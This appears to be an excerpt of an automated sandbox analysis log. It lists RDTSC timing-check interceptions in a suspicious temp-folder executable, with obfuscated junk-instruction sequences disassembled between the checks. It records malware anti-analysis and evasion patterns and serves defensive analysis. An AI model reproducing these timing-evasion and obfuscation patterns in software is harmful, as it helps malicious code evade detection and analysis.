                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DF7E5 second address: 8DF7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6178F second address: A61799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E55 second address: A49E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E5A second address: A49E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEEh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E6E second address: A49E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E72 second address: A49E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60C09 second address: A60C11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60EC3 second address: A60ED3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60ED3 second address: A60F03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF30D194DC8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F03 second address: A60F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F07 second address: A60F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FF30D194DB6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F2A second address: A60F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF30CF3CAE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F3A second address: A60F44 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6453A second address: A645DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c clc 0x0000000d push 00000003h 0x0000000f mov edx, dword ptr [ebp+122D1B78h] 0x00000015 push 00000000h 0x00000017 jmp 00007FF30CF3CAF8h 0x0000001c jmp 00007FF30CF3CAEEh 0x00000021 push 00000003h 0x00000023 mov edi, ecx 0x00000025 call 00007FF30CF3CAF4h 0x0000002a stc 0x0000002b pop ecx 0x0000002c call 00007FF30CF3CAE9h 0x00000031 jmp 00007FF30CF3CAEDh 0x00000036 push eax 0x00000037 pushad 0x00000038 jmp 00007FF30CF3CAF2h 0x0000003d pushad 0x0000003e push eax 0x0000003f pop eax 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 popad 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF30CF3CAF5h 0x00000051 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A645DF second address: A645F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A645F6 second address: A64635 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF30CF3CAF3h 0x00000008 jmp 00007FF30CF3CAEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007FF30CF3CAEEh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF30CF3CAF2h 0x00000022 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A64635 second address: A64669 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30D194DBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov si, cx 0x0000000e mov di, si 0x00000011 lea ebx, dword ptr [ebp+12458364h] 0x00000017 movzx edi, si 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d jne 00007FF30D194DB6h 0x00000023 jnp 00007FF30D194DB6h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A64669 second address: A6467A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF30CF3CAECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6484B second address: A6484F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6484F second address: A64853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6487D second address: A64883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A64883 second address: A648B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30CF3CAE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FF30CF3CAEEh 0x00000011 jne 00007FF30CF3CAE8h 0x00000017 pushad 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 41A576A5h 0x0000001f push 00000000h 0x00000021 mov esi, 1D530DA0h 0x00000026 push 35E052F4h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jne 00007FF30CF3CAE6h 0x00000034 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A648B9 second address: A64933 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FF30D194DC0h 0x00000010 pop esi 0x00000011 popad 0x00000012 xor dword ptr [esp], 35E05274h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FF30D194DB8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 stc 0x00000034 mov ecx, dword ptr [ebp+122D365Dh] 0x0000003a push 00000003h 0x0000003c jl 00007FF30D194DBCh 0x00000042 or esi, dword ptr [ebp+122D33E9h] 0x00000048 push 00000000h 0x0000004a mov edx, dword ptr [ebp+122D1BDAh] 0x00000050 push 00000003h 0x00000052 mov edi, 6D15D702h 0x00000057 push 97303CECh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f ja 00007FF30D194DB6h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A64933 second address: A6493D instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6493D second address: A64981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 57303CECh 0x0000000d call 00007FF30D194DBBh 0x00000012 jns 00007FF30D194DB7h 0x00000018 stc 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+12458378h] 0x00000020 jmp 00007FF30D194DC8h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8240B second address: A82413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82578 second address: A82584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A826E6 second address: A826FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF0h 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A826FB second address: A82711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82711 second address: A8272D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF30CF3CAF4h 0x0000000c pop edi 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8272D second address: A82744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF30D194DB6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d js 00007FF30D194DB6h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82876 second address: A8287A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8287A second address: A82880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82B0E second address: A82B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF30CF3CAF2h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82C7A second address: A82C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82C7E second address: A82C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF30CF3CAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FF30CF3CAE6h 0x00000014 jmp 00007FF30CF3CAEAh 0x00000019 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82C9C second address: A82CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82CA0 second address: A82CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82DFB second address: A82E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82E04 second address: A82E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A82E0A second address: A82E24 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF30D194DB6h 0x00000008 jmp 00007FF30D194DBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83108 second address: A8312F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF30CF3CAEDh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF30CF3CAEEh 0x00000010 jp 00007FF30CF3CAE6h 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8312F second address: A83133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83133 second address: A8314B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF30CF3CAFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FF30CF3CAE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8314B second address: A8314F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83501 second address: A83528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAECh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF30CF3CAEEh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83528 second address: A8355F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC5h 0x00000007 jg 00007FF30D194DBEh 0x0000000d jnp 00007FF30D194DB6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007FF30D194DB6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8355F second address: A83565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83565 second address: A8356A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8356A second address: A83572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83B40 second address: A83B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83CAB second address: A83CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83F76 second address: A83FC4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF30D194DC5h 0x0000000f jmp 00007FF30D194DC8h 0x00000014 popad 0x00000015 jne 00007FF30D194DDFh 0x0000001b jne 00007FF30D194DBCh 0x00000021 jnc 00007FF30D194DB6h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A83FC4 second address: A83FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A87BA7 second address: A87BCD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF30D194DCBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A88180 second address: A88184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A869F0 second address: A86A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF30D194DBFh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF30D194DBDh 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A87186 second address: A8718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8718A second address: A871AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF30D194DBCh 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A88266 second address: A8826C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8826C second address: A882A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FF30D194DC5h 0x00000010 pop ecx 0x00000011 jmp 00007FF30D194DBEh 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c jg 00007FF30D194DBCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A882A9 second address: A882BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jng 00007FF30CF3CAE6h 0x00000010 pop ebx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A882BA second address: A882C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A882C0 second address: A882D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A88420 second address: A88425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A88425 second address: A8842A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8842A second address: A8843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF30D194DB8h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8F4AE second address: A8F4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A8F5FA second address: A8F629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF30D194DC1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FF30D194DC3h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A9120B second address: A9120F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A91481 second address: A91485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A919BC second address: A919C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
